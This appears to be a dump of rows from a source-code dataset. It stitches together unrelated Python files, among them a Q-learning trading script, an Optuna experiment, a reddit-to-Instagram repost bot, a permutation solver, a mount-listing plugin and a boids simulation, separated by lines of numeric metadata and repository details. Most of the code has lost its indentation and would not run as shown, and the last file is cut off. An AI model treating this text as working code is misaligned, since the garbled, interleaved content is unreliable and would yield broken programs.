plt.savefig('plt/' + 'knapsack_' + str(epoch) + '.png')
plt.close('all')
'''
# save a figure of the test set
plt.figure(figsize=(10, 25))
for i in range(xdata.T.shape[0]):
#frame = pd.concat(btFrame, axis=1)
bt = twp.Backtest(pd.Series(data=[x for x in xdata.T[i]], index=signal.index.values), signal, signalType='shares')
reward += np.max(bt.pnl.iloc[-1])
bt.plotTrades()
#plt.axvline(x=400, color='black', linestyle='--')
#plt.text(250, 400, 'training data')
#plt.text(450, 400, 'test data')
#plt.suptitle(str(epoch))
plt.savefig('plt/' + 'knapsack_' + str(epoch) + '.png', bbox_inches='tight', pad_inches=1, dpi=72)
plt.close('all')
'''
# print(time_step, terminal_state, eval, reward)
return reward
def evaluate_Q(eval_data, eval_model, epoch=0):
# This function is used to evaluate the performance of the system each epoch, without the influence of epsilon and random actions
signal = pd.Series(index=np.arange(len(eval_data)))
state, xdata, price_data = all_init_data()
status = 1
terminal_state = 0
time_step = 1
while (status == 1):
# We start in state S
qval = eval_model.predict(state, batch_size=batch_size)
action = (np.argmax(qval))
# Take action, observe new state S'
new_state, time_step, signal, terminal_state = take_action(state, xdata, action, signal, time_step)
# Observe reward
eval_reward = get_reward(new_state, time_step, action, price_data, signal, terminal_state, eval=True,
epoch=epoch)
state = new_state
if terminal_state == 1: # terminal state
status = 0
return eval_reward
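# Illustrative helper (not in the original script): the Q-learning target used inside the
# experience-replay loop below, pulled out so the update rule reads in one place.
def q_target_example(reward, max_next_q, gamma, terminal_state):
    # Non-terminal states bootstrap from the best next-state value; terminal states use the reward alone.
    return reward if terminal_state == 1 else reward + gamma * max_next_q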
if __name__ == "__main__":
    # This neural network is the Q-function, run it like this:
# model.predict(state.reshape(1,64), batch_size=1)
batch_size = 7
num_features = 2544
epochs = 3
gamma = 0.95 # since the reward can be several time steps away, make gamma high
epsilon = 1
batchSize = 100
buffer = 200
replay = []
learning_progress = []
model = Sequential()
model.add(LSTM(64,
input_shape=(1, num_features),
return_sequences=True,
stateful=False))
model.add(Dropout(0.5))
model.add(LSTM(64,
input_shape=(1, num_features),
return_sequences=False,
stateful=False))
model.add(Dropout(0.5))
model.add(Dense(4, init='lecun_uniform'))
model.add(Activation('linear')) # linear output so we can have range of real-valued outputs
rms = RMSprop()
adam = Adam()
model.compile(loss='mse', optimizer=adam)
start_time = timeit.default_timer()
# read_convert_data(symbol='XBTEUR') #run once to read indata, resample and convert to pickle
astate, xdata, aprice_data = all_init_data()
bstate, test_data, test_price_data = all_init_data(test=True)
'''
bstate, test_data, test_price_data = all_init_data(test=True)
print(astate.shape)
print(bstate.shape)
print(xdata.shape)
print(test_data.shape)
print(price_data.shape)
print(test_price_data.shape)
'''
# stores tuples of (S, A, R, S')
h = 0
# signal = pd.Series(index=market_data.index)
signal = pd.Series(index=np.arange(len(xdata)))
for i in range(epochs):
        if i == epochs - 1:  # the last epoch, use the test data set
            state, xdata, price_data = all_init_data(test=True)
        else:
            state, xdata, price_data = all_init_data()
status = 1
terminal_state = 0
time_step = 5
# while game still in progress
while (status == 1):
# We are in state S
# Let's run our Q function on S to get Q values for all possible actions
print('epoch ' + str(i))
qval = model.predict(state, batch_size=batch_size)
if (random.random() < epsilon): # choose random action
action = np.random.randint(0, 4) # assumes 4 different actions
else: # choose best action from Q(s,a) values
action = (np.argmax(qval))
# Take action, observe new state S'
new_state, time_step, signal, terminal_state = take_action(state, xdata, action, signal, time_step)
# Observe reward
reward = get_reward(new_state, time_step, action, price_data, signal, terminal_state)
print('new_state', new_state)
print('reward', reward)
# Experience replay storage
if (len(replay) < buffer): # if buffer not filled, add to it
replay.append((state, action, reward, new_state))
# print(time_step, reward, terminal_state)
else: # if buffer full, overwrite old values
if (h < (buffer - 1)):
h += 1
else:
h = 0
replay[h] = (state, action, reward, new_state)
# randomly sample our experience replay memory
minibatch = random.sample(replay, batchSize)
X_train = []
y_train = []
for memory in minibatch:
# Get max_Q(S',a)
old_state, action, reward, new_state = memory
old_qval = model.predict(old_state, batch_size=batch_size)
newQ = model.predict(new_state, batch_size=batch_size)
maxQ = np.max(newQ)
y = np.zeros((1, 4))
y[:] = old_qval[:]
if terminal_state == 0: # non-terminal state
update = (reward + (gamma * maxQ))
else: # terminal state
update = reward
# print('rewardbase', reward)
# print('update', update)
y[0][action] = update
# print(time_step, reward, terminal_state)
X_train.append(old_state)
y_train.append(y.reshape(4, ))
X_train = np.squeeze(np.array(X_train), axis=(1))
y_train = np.array(y_train)
model.fit(X_train, y_train, batch_size=batchSize, epochs=100, verbose=0)
state = new_state
if terminal_state == 1: # if reached terminal state, update epoch status
status = 0
eval_reward = evaluate_Q(test_data, model, i)
# eval_reward = value_iter(test_data, epsilon, epochs)
learning_progress.append(eval_reward)
print("Epoch #: %s Reward: %f Epsilon: %f" % (i, eval_reward, epsilon))
# learning_progress.append((reward))
if epsilon > 0.1: # decrement epsilon over time
epsilon -= (1.0 / epochs)
elapsed = np.round(timeit.default_timer() - start_time, decimals=2)
print("Completed in %f" % (elapsed,))
bt = twp.Backtest(pd.Series(data=[x[0] for x in test_price_data]), signal, signalType='shares')
bt.data['delta'] = bt.data['shares'].diff().fillna(0)
print(bt.data)
bt.data.to_csv('plt/knapsack_data.csv')
unique, counts = np.unique(filter(lambda v: v == v, signal.values), return_counts=True)
print(np.asarray((unique, counts)).T)
plt.figure()
plt.subplot(3, 1, 1)
bt.plotTrades()
plt.subplot(3, 1, 2)
bt.pnl.plot(style='x-')
plt.subplot(3, 1, 3)
plt.plot(learning_progress)
print('to plot', learning_progress)
plt.savefig('plt/knapsack_summary' + '.png', bbox_inches='tight', pad_inches=1, dpi=72)
plt.show()
| 36.134211
| 145
| 0.610516
| 1,841
| 13,731
| 4.435633
| 0.23031
| 0.03037
| 0.009429
| 0.011021
| 0.296228
| 0.267205
| 0.24602
| 0.187607
| 0.170463
| 0.155033
| 0
| 0.023539
| 0.269827
| 13,731
| 379
| 146
| 36.229551
| 0.790944
| 0.165247
| 0
| 0.212766
| 0
| 0
| 0.045692
| 0.002109
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029787
| false
| 0.004255
| 0.068085
| 0.004255
| 0.13617
| 0.042553
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880a98e6cfdd279e5621d17d6384a4912cab6353
| 7,165
|
py
|
Python
|
experiments/experiment_01.py
|
bask0/q10hybrid
|
9b18af9dd382c65dd667139f97e7da0241091a2c
|
[
"Apache-2.0"
] | 2
|
2021-05-05T13:37:58.000Z
|
2021-05-05T15:11:07.000Z
|
experiments/experiment_01.py
|
bask0/q10hybrid
|
9b18af9dd382c65dd667139f97e7da0241091a2c
|
[
"Apache-2.0"
] | null | null | null |
experiments/experiment_01.py
|
bask0/q10hybrid
|
9b18af9dd382c65dd667139f97e7da0241091a2c
|
[
"Apache-2.0"
] | 1
|
2021-11-23T18:13:08.000Z
|
2021-11-23T18:13:08.000Z
|
import pytorch_lightning as pl
import optuna
import xarray as xr
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from pytorch_lightning.callbacks.model_checkpoint import ModelCheckpoint
import os
import shutil
from argparse import ArgumentParser
from datetime import datetime
from project.fluxdata import FluxData
from models.hybrid import Q10Model
# Hardcoded `Trainer` args. Note that these cannot be passed via cli.
TRAINER_ARGS = dict(
max_epochs=100,
log_every_n_steps=1,
weights_summary=None
)
class Objective(object):
def __init__(self, args):
self.args = args
def __call__(self, trial: optuna.trial.Trial) -> float:
q10_init = trial.suggest_float('q10_init', 0.0001, 1000.)
seed = trial.suggest_int('seed', 0, 999999999999)
use_ta = trial.suggest_categorical('use_ta', [True, False])
dropout = trial.suggest_float('dropout', 0.0, 1.0)
if use_ta:
features = ['sw_pot', 'dsw_pot', 'ta']
else:
features = ['sw_pot', 'dsw_pot']
pl.seed_everything(seed)
# Further variables used in the hybrid model.
physical = ['ta']
# Target (multiple targets not possible currently).
targets = ['reco']
# Find variables that are only needed in physical model but not in NN.
physical_exclusive = [v for v in physical if v not in features]
# ------------
# data
# ------------
ds = xr.open_dataset(self.args.data_path)
fluxdata = FluxData(
ds,
features=features + physical_exclusive,
targets=targets,
context_size=1,
train_time=slice('2003-01-01', '2006-12-31'),
valid_time=slice('2007-01-01', '2007-12-31'),
test_time=slice('2008-01-01', '2008-12-31'),
batch_size=self.args.batch_size,
data_loader_kwargs={'num_workers': 4})
train_loader = fluxdata.train_dataloader()
val_loader = fluxdata.val_dataloader()
test_loader = fluxdata.test_dataloader()
# Create empty xr.Dataset, will be used by the model to save predictions every epoch.
max_epochs = TRAINER_ARGS['max_epochs']
ds_pred = fluxdata.target_xr('valid', varnames=['reco', 'rb'], num_epochs=max_epochs)
# ------------
# model
# ------------
model = Q10Model(
features=features,
targets=targets,
norm=fluxdata._norm,
ds=ds_pred,
q10_init=q10_init,
hidden_dim=self.args.hidden_dim,
num_layers=self.args.num_layers,
learning_rate=self.args.learning_rate,
dropout=dropout,
weight_decay=self.args.weight_decay,
num_steps=len(train_loader) * max_epochs)
# ------------
# training
# ------------
trainer = pl.Trainer.from_argparse_args(
self.args,
default_root_dir=self.args.log_dir,
**TRAINER_ARGS,
callbacks=[
EarlyStopping(
monitor='valid_loss',
patience=10,
min_delta=0.00001),
ModelCheckpoint(
filename='{epoch}-{val_loss:.2f}',
save_top_k=1,
verbose=False,
monitor='valid_loss',
mode='min',
prefix=model.__class__.__name__)
])
trainer.fit(model, train_loader, val_loader)
# ------------
# testing
# ------------
# trainer.test(test_dataloaders=test_loader)
# ------------
# save results
# ------------
# Store predictions.
ds = fluxdata.add_scalar_record(model.ds, varname='q10', x=model.q10_history)
trial.set_user_attr('q10', ds.q10[-1].item())
# Add some attributes that are required for analysis.
ds.attrs = {
'created': datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
'author': 'bkraft@bgc-jena.mpg.de',
'q10_init': q10_init,
'dropout': dropout,
'use_ta': int(use_ta),
'loss': trainer.callback_metrics['valid_loss'].item()
}
ds = ds.isel(epoch=slice(0, trainer.current_epoch + 1))
# Save data.
save_dir = os.path.join(model.logger.log_dir, 'predictions.nc')
print(f'Saving predictions to: {save_dir}')
ds.to_netcdf(save_dir)
return trainer.callback_metrics['valid_loss'].item()
@staticmethod
def add_project_specific_args(parent_parser: ArgumentParser) -> ArgumentParser:
parser = ArgumentParser(parents=[parent_parser], add_help=False)
parser.add_argument(
'--batch_size', default=240, type=int)
parser.add_argument(
'--data_path', default='./data/Synthetic4BookChap.nc', type=str)
parser.add_argument(
'--log_dir', default='./logs/experiment_01/', type=str)
return parser
def main(parser: ArgumentParser = None, **kwargs):
"""Use kwargs to overload argparse args."""
# ------------
# args
# ------------
if parser is None:
parser = ArgumentParser()
parser = Objective.add_project_specific_args(parser)
parser = pl.Trainer.add_argparse_args(parser)
parser = Q10Model.add_model_specific_args(parser)
parser.add_argument('--create_study', action='store_true', help='create new study (deletes old) and exits')
    parser.add_argument('--single_seed', action='store_true', help='use only one seed instead of (0, ..., 9).')
args = parser.parse_args()
globargs = TRAINER_ARGS.copy()
globargs.update(kwargs)
for k, v in globargs.items():
setattr(args, k, v)
# ------------
# study setup
# ------------
search_space = {
'q10_init': [0.5, 1.5, 2.5],
'seed': [0] if args.single_seed else [i for i in range(10)],
'dropout': [0.0, 0.2, 0.4, 0.6],
'use_ta': [True, False]
}
sql_file = os.path.abspath(os.path.join(args.log_dir, "optuna.db"))
sql_path = f'sqlite:///{sql_file}'
    if args.create_study or (not os.path.isfile(sql_file)):
if os.path.isdir(args.log_dir):
shutil.rmtree(args.log_dir)
os.makedirs(args.log_dir, exist_ok=True)
study = optuna.create_study(
study_name="q10hybrid",
storage=sql_path,
sampler=optuna.samplers.GridSampler(search_space),
direction='minimize',
load_if_exists=False)
if args.create_study:
return None
if not os.path.isdir(args.log_dir):
os.makedirs(args.log_dir)
# ------------
# run study
# ------------
n_trials = 1
for _, v in search_space.items():
n_trials *= len(v)
study = optuna.load_study(
study_name="q10hybrid",
storage=sql_path,
sampler=optuna.samplers.GridSampler(search_space))
study.optimize(Objective(args), n_trials=n_trials)
if __name__ == '__main__':
main()
| 32.130045
| 112
| 0.579204
| 839
| 7,165
| 4.72348
| 0.330155
| 0.020187
| 0.017663
| 0.014635
| 0.09084
| 0.081252
| 0.055514
| 0.055514
| 0.040373
| 0.040373
| 0
| 0.029578
| 0.282763
| 7,165
| 222
| 113
| 32.274775
| 0.741584
| 0.105234
| 0
| 0.074324
| 0
| 0
| 0.101067
| 0.014595
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0.074324
| 0
| 0.128378
| 0.006757
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880bad578d9944f1ec06e580824fc923f1978b8e
| 2,886
|
py
|
Python
|
main.py
|
warifp/InstagramPostAndDelete
|
d22577325eccf42e629cef076ab43f7788587bc4
|
[
"MIT"
] | 4
|
2019-06-03T04:00:51.000Z
|
2021-11-09T21:34:38.000Z
|
main.py
|
nittaya1990/InstagramPostAndDelete
|
d22577325eccf42e629cef076ab43f7788587bc4
|
[
"MIT"
] | null | null | null |
main.py
|
nittaya1990/InstagramPostAndDelete
|
d22577325eccf42e629cef076ab43f7788587bc4
|
[
"MIT"
] | 4
|
2019-10-30T19:44:08.000Z
|
2021-09-07T16:30:09.000Z
|
#! @@Author : WAHYU ARIF PURNOMO
#! @@Create : 18 January 2019
#! @@Modify : 19 January 2019
#! Images are taken from reddit.
#! Use a VPN because reddit's DNS is blocked in Indonesia.
import os
import json
import requests
import progressbar
from PIL import Image
from lxml import html
from time import sleep
from ImageDeleter import delete_png
from InstagramAPI import InstagramAPI
InstagramAPI = InstagramAPI(input("Username: "), input("Password: "))
while True:
if (InstagramAPI.login()):
break
else:
for x in range(300):
os.system('cls')
print(300-x)
sleep(1)
global useable
useable = []
os.system('pause')
def get_image():
    print("Starting to fetch images ..")
json_raw = requests.get('https://www.reddit.com/r/me_irl/new/.json', headers = {'User-agent': 'Image_Testing_V3'}).json()
json_data = json_raw['data']
json_children = json_data['children']
for x in range(len(json_children)):
json_current = json_children[x]
json_current_data = json_current['data']
json_current_url = json_current_data['url']
if "https://i.redd.it/" not in json_current_url:
pass
else:
if json_current_url not in useable:
useable.append(json_current_url)
download()
else:
pass
def download():
    print("Starting download ..")
global filename
new_filename = ""
filename = useable[-1]
filename = filename.replace("https://i.redd.it/", "")
print(filename)
f = open(filename, 'wb')
f.write(requests.get(useable[-1]).content)
f.close()
    if filename[-3:] != 'jpg':
im = Image.open(filename)
for x in range(len(filename)-3):
new_filename = new_filename + filename[x]
im = im.convert("RGB")
im.save("edit" + new_filename + 'jpg')
new_filename = "edit" + new_filename + "jpg"
print(new_filename)
else:
new_filename = filename
upload(new_filename)
def delete_image(bad_file):
    print("Starting to delete image ..")
    if bad_file.startswith("edit"):
png_bad_file = ''
for x in range(len(bad_file)-3):
png_bad_file = png_bad_file + bad_file[x]
png_bad_file = png_bad_file + "png"
try:
os.remove(png_bad_file)
except Exception as e:
pass
os.remove(bad_file)
delete_png()
    print("Done.")
wait()
def upload(file):
    print("Starting upload ..")
caption = ""
InstagramAPI.uploadPhoto(file, caption=caption)
delete_image(file)
def wait():
for i in progressbar.progressbar(range(1800)):
sleep(1)
while True:
get_image()
    print("Image uploaded successfully.")
sleep(5)
os.system('pause')
| 28.574257
| 125
| 0.615731
| 372
| 2,886
| 4.61828
| 0.330645
| 0.057043
| 0.034924
| 0.025611
| 0.071595
| 0.023283
| 0
| 0
| 0
| 0
| 0
| 0.017274
| 0.257796
| 2,886
| 100
| 126
| 28.86
| 0.784781
| 0.063756
| 0
| 0.149425
| 0
| 0
| 0.114201
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057471
| false
| 0.045977
| 0.103448
| 0
| 0.16092
| 0.103448
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880bf5d9dd1fda0ba4fc9eafcb000337f1273e4d
| 1,673
|
py
|
Python
|
DFS_Backtracking/31. Next Permutation.py
|
xli1110/LC
|
3c18b8809c5a21a62903060eef659654e0595036
|
[
"MIT"
] | 2
|
2021-04-02T11:57:46.000Z
|
2021-04-02T11:57:47.000Z
|
DFS_Backtracking/31. Next Permutation.py
|
xli1110/LC
|
3c18b8809c5a21a62903060eef659654e0595036
|
[
"MIT"
] | null | null | null |
DFS_Backtracking/31. Next Permutation.py
|
xli1110/LC
|
3c18b8809c5a21a62903060eef659654e0595036
|
[
"MIT"
] | null | null | null |
class Solution:
def __init__(self):
self.res = []
self.path = []
def arr_to_num(self, arr):
s = ""
for x in arr:
s += str(x)
return int(s)
def find_position(self, nums):
for i in range(len(self.res)):
if self.res[i] == nums:
if i == len(self.res) - 1:
return 0
# we need the check below for duplicate elements in nums
# run nums = [1, 5, 1] and see the case
next_num = self.arr_to_num(self.res[i + 1])
if next_num > self.arr_to_num(nums):
return i + 1
        raise Exception("The permutation function has a bug: the input was not found among the generated permutations.")
def DFS(self, arr):
if not arr:
self.res.append(self.path[:])
return
for i in range(len(arr)):
self.path.append(arr[i])
self.DFS(arr[:i] + arr[i + 1:])
self.path.pop()
def nextPermutation(self, nums: [int]) -> None:
"""
Do not return anything, modify nums in-place instead.
"""
if not nums:
raise Exception("Empty Array")
# all permutations
# note that we need to SORT the array at first
arr = nums[:]
arr.sort()
self.DFS(arr)
# find position
position = self.find_position(nums)
# in-place replacement
for i in range(len(nums)):
nums[i] = self.res[position][i]
if __name__ == "__main__":
sol = Solution()
# nums = [2, 1, 3]
nums = [1, 5, 1]
sol.nextPermutation(nums)
print(sol.res)
| 26.140625
| 89
| 0.499701
| 218
| 1,673
| 3.733945
| 0.348624
| 0.060197
| 0.029484
| 0.040541
| 0.09828
| 0.046683
| 0
| 0
| 0
| 0
| 0
| 0.013579
| 0.383742
| 1,673
| 63
| 90
| 26.555556
| 0.775946
| 0.156007
| 0
| 0
| 0
| 0
| 0.058611
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0
| 0
| 0.25
| 0.025
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880c149eaa01b78f766f6b8032706b3698b74fbc
| 1,392
|
py
|
Python
|
plugin/DataExport/extend.py
|
konradotto/TS
|
bf088bd8432b1e3f4b8c8c083650a30d9ef2ae2e
|
[
"Apache-2.0"
] | 125
|
2015-01-22T05:43:23.000Z
|
2022-03-22T17:15:59.000Z
|
plugin/DataExport/extend.py
|
konradotto/TS
|
bf088bd8432b1e3f4b8c8c083650a30d9ef2ae2e
|
[
"Apache-2.0"
] | 59
|
2015-02-10T09:13:06.000Z
|
2021-11-11T02:32:38.000Z
|
plugin/DataExport/extend.py
|
konradotto/TS
|
bf088bd8432b1e3f4b8c8c083650a30d9ef2ae2e
|
[
"Apache-2.0"
] | 98
|
2015-01-17T01:25:10.000Z
|
2022-03-18T17:29:42.000Z
|
#!/usr/bin/python
# Copyright (C) 2015 Ion Torrent Systems, Inc. All Rights Reserved
import subprocess
import re
pluginName = 'DataExport'
pluginDir = ""
networkFS = ["nfs", "cifs"]
localFS = ["ext4", "ext3", "xfs", "ntfs", "exfat", "vboxsf"]
supportedFS = ",".join(localFS + networkFS)
def test(bucket):
return bucket
def runProcess(exe):
p = subprocess.Popen(exe, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return iter(p.stdout.readline, b'')
def runProcessAndReturnLastLine(exe):
p = subprocess.Popen(exe, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.stdout.readlines()[-1]
def backupDevices(bucket):
devices = ""
cmd = "mount -l -t " + supportedFS
for line in runProcess(cmd.split()):
line_arr = line.split()
folder = line_arr[2]
fstype = line_arr[4]
perms = line_arr[5]
if perms.find('w') != -1:
use = True
if fstype in localFS:
m = re.match('^(/media|/mnt)', folder)
if not m:
use = False
if use:
cmd2 = "df -h %s " % folder
df = runProcessAndReturnLastLine(cmd2.split())
avail = df.split()[2]
devices = devices + "<OPTION VALUE=\"" + folder + "\">" + folder + " (" + avail + " free, " + fstype + ")</option>"
return devices
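# Example of the parsing above (a hypothetical mount line, shown only for illustration):
#   /dev/sdb1 on /media/usb type ext4 (rw,relatime)
# After split(), line_arr[2] is the mount folder ('/media/usb'), line_arr[4] the filesystem
# type ('ext4') and line_arr[5] the option string ('(rw,relatime)'), which is searched for
# 'w' to decide whether the mount is writable.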
| 27.84
| 131
| 0.569684
| 156
| 1,392
| 5.057692
| 0.538462
| 0.035488
| 0.035488
| 0.048162
| 0.17744
| 0.17744
| 0.17744
| 0.17744
| 0.17744
| 0.17744
| 0
| 0.014042
| 0.283764
| 1,392
| 49
| 132
| 28.408163
| 0.777332
| 0.05819
| 0
| 0.057143
| 0
| 0
| 0.097021
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.114286
| false
| 0
| 0.057143
| 0.028571
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880c1d871834c4fa9a80907f77053c53af975688
| 5,205
|
py
|
Python
|
boids/biods_object.py
|
PaulAustin/sb7-pgz
|
fca3e50132b9d1894fb348b2082e83ce7b937b19
|
[
"MIT"
] | 1
|
2022-02-21T15:54:01.000Z
|
2022-02-21T15:54:01.000Z
|
boids/biods_object.py
|
PaulAustin/sb7-pgz
|
fca3e50132b9d1894fb348b2082e83ce7b937b19
|
[
"MIT"
] | null | null | null |
boids/biods_object.py
|
PaulAustin/sb7-pgz
|
fca3e50132b9d1894fb348b2082e83ce7b937b19
|
[
"MIT"
] | 2
|
2020-11-21T16:34:22.000Z
|
2021-01-27T10:30:34.000Z
|
# Ported from the JavaScript version to Python and Pygame Zero
# Designed to work well with mu-editor environment.
#
# The original JavaScript version was done by Ben Eater
# at https://github.com/beneater/boids (MIT License)
# No endorsement implied.
#
# Complex numbers are used as vectors to integrate x and y positions and velocities
# MIT license (details in parent directory)
import random
import time
HEIGHT = 500 # window height
WIDTH = 900 # window width
MARGIN = 150 # distance at which to start avoiding the edge
NUM_BOIDS = 75
VISUAL_RANGE = 70 # radius of influence for most algorithms
SPEED_LIMIT_UPPER = 13 # boids can only fly so fast
SPEED_LIMIT_LOWER = 3 # a boid will fall if flying too slowly
SPEED_INIT = 20 # range for random velocity
MIN_DISTANCE = 10 # the distance to stay away from other boids
AVOID_FACTOR = 0.05 # % location change if too close
CENTERING_FACTOR = 0.050 # % location change to pull to center
MATCHING_FACTOR = 0.015 # % velocity change if close
MARGIN_FACTOR = 0.25+0.0j # rate of turning away from edge
HISTORY_LENGTH = 30
BACK_COLOR = (0, 0, 90)
BOID_COLOR = (255, 128, 128)
BOID_SIZE = 8
TRAIL_COLOR = (255, 255, 64)
g_boids = []
class Boid:
def __init__(boid) :
boid.loc = complex(
(random.randint(0, WIDTH)),
(random.randint(0, HEIGHT)))
boid.vel = complex(
(random.randint(-SPEED_INIT, SPEED_INIT)),
(random.randint(-SPEED_INIT, SPEED_INIT)))
boid.history = []
def keep_within_bounds(boid) :
# Constrain a boid to within the window. If it gets too close to an edge,
# nudge it back in and reverse its direction.
if (boid.loc.real < MARGIN):
boid.vel += MARGIN_FACTOR * 1.0
if (boid.loc.real > WIDTH - MARGIN) :
boid.vel += MARGIN_FACTOR * -1.0
if (boid.loc.imag < MARGIN) :
boid.vel += MARGIN_FACTOR * 1.0j
if (boid.loc.imag > HEIGHT - MARGIN) :
boid.vel += MARGIN_FACTOR * -1.0j
def fly_towards_center(boid):
# Find the center of mass of the other boids and
# adjust velocity slightly to point towards the
# center of mass.
center = 0+0j
num_neighbors = 0
for other_boid in g_boids :
if abs(boid.loc - other_boid.loc) < VISUAL_RANGE :
center += other_boid.loc
num_neighbors += 1
if num_neighbors > 0 :
center = center / num_neighbors
boid.loc += (center - boid.loc) * CENTERING_FACTOR
def avoid_others(boid):
# Move away from other boids that are too close to avoid colliding
move = 0+0j
for other_boid in g_boids :
if not (other_boid is boid) :
if abs(boid.loc - other_boid.loc) < MIN_DISTANCE :
move += boid.loc - other_boid.loc
boid.vel += move * AVOID_FACTOR
def match_velocity(boid):
# Find the average velocity (speed and direction)
# of the other boids and adjust velocity slightly to match.
avg_vel = 0+0j
num_neighbors = 0
for otherBoid in g_boids:
if abs(boid.loc - otherBoid.loc) < VISUAL_RANGE :
avg_vel += otherBoid.vel
num_neighbors += 1
if num_neighbors > 0:
avg_vel /= num_neighbors
boid.vel += (avg_vel - boid.vel) * MATCHING_FACTOR
def limit_speed(boid):
# Speed will naturally vary in flocking behavior,
# but real animals can't go arbitrarily fast (or slow)
speed = abs(boid.vel)
if (speed > SPEED_LIMIT_UPPER) :
boid.vel = boid.vel / speed * SPEED_LIMIT_UPPER
if (speed < SPEED_LIMIT_LOWER) :
boid.vel = boid.vel / speed * SPEED_LIMIT_LOWER
return
def draw(boid):
screen.draw.filled_circle((boid.loc.real, boid.loc.imag), BOID_SIZE, BOID_COLOR)
tail = boid.loc + boid.vel * -1.8
screen.draw.line(
(boid.loc.real, boid.loc.imag),
(tail.real, tail.imag),
BOID_COLOR)
def draw_trail(boid):
pt_from = (boid.loc.real, boid.loc.imag)
for p in boid.history:
pt_to = (p.real, p.imag)
screen.draw.line(pt_from, pt_to, TRAIL_COLOR)
pt_from = pt_to
def draw():
screen.fill(BACK_COLOR)
if keyboard.space:
for boid in g_boids:
boid.draw_trail()
for boid in g_boids:
boid.draw()
screen.draw.text("space:tails r:restart", (20, 20))
def update():
for boid in g_boids:
# Apply rules
boid.fly_towards_center()
boid.avoid_others()
boid.match_velocity()
boid.limit_speed()
boid.keep_within_bounds()
# Update the position based on the current velocity
boid.loc += boid.vel
boid.history.insert(0, boid.loc)
boid.history = boid.history[:HISTORY_LENGTH]
def init():
global g_boids
g_boids = [Boid() for _ in range(NUM_BOIDS)]
def on_key_down(key, mod, unicode):
if (key == keys.R):
init()
init()
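# Illustrative note (not part of the original script): complex numbers stand in for 2-D vectors
# throughout, so position and velocity updates are plain complex arithmetic and abs() gives the
# Euclidean distance. A minimal sketch of the same idea:
def _example_complex_vectors():
    a = complex(3, 4)          # a point at (3, 4)
    b = complex(0, 0)          # the origin
    distance = abs(a - b)      # 5.0, the same metric used in the VISUAL_RANGE checks
    nudged = a + 0.25 + 0.0j   # a MARGIN_FACTOR-style nudge along +x
    return distance, nudged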
| 31.932515
| 88
| 0.602882
| 714
| 5,205
| 4.2493
| 0.292717
| 0.055372
| 0.015821
| 0.019776
| 0.223797
| 0.212591
| 0.158866
| 0.051417
| 0.051417
| 0.023731
| 0
| 0.024722
| 0.308357
| 5,205
| 162
| 89
| 32.12963
| 0.818056
| 0.244573
| 0
| 0.117117
| 0
| 0
| 0.005644
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108108
| false
| 0
| 0.018018
| 0
| 0.144144
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
880d1df9e7fa8cda82be2e587cdbae5ea94afb44
| 4,960
|
py
|
Python
|
upoutdf/types/recurring/yearly.py
|
UpOut/UpOutDF
|
5d2f87884565d98b77e25c6a26af7dbea266be76
|
[
"MIT"
] | null | null | null |
upoutdf/types/recurring/yearly.py
|
UpOut/UpOutDF
|
5d2f87884565d98b77e25c6a26af7dbea266be76
|
[
"MIT"
] | null | null | null |
upoutdf/types/recurring/yearly.py
|
UpOut/UpOutDF
|
5d2f87884565d98b77e25c6a26af7dbea266be76
|
[
"MIT"
] | null | null | null |
# coding: utf-8
import pytz
from dateutil.relativedelta import relativedelta
from .base import BaseRecurring
from upoutdf.occurences import OccurenceBlock, OccurenceGroup
from upoutdf.constants import YEARLY_TYPE
class YearlyType(BaseRecurring):
year_day = None
required_attributes = [
'every',
'timezone',
'starting_time',
'lasting_seconds',
'type',
'starting_date'
]
def increment_by(self):
return relativedelta(years=+self.every)
def _snap_datetime(self,datetime,yearday):
if datetime is None:
return None
snapper = self.snapping_class(self.timezone)
return snapper.snap_to_year_day(datetime,yearday)
def _canonicalize_date(self,date):
if not date.tzinfo:
date = date.replace(tzinfo=pytz.utc)
if date.tzinfo != self.timezone:
date = self.timezone.normalize(date.astimezone(self.timezone))
return date
def canonicalize(self):
canonical = "every %s year" % self.every
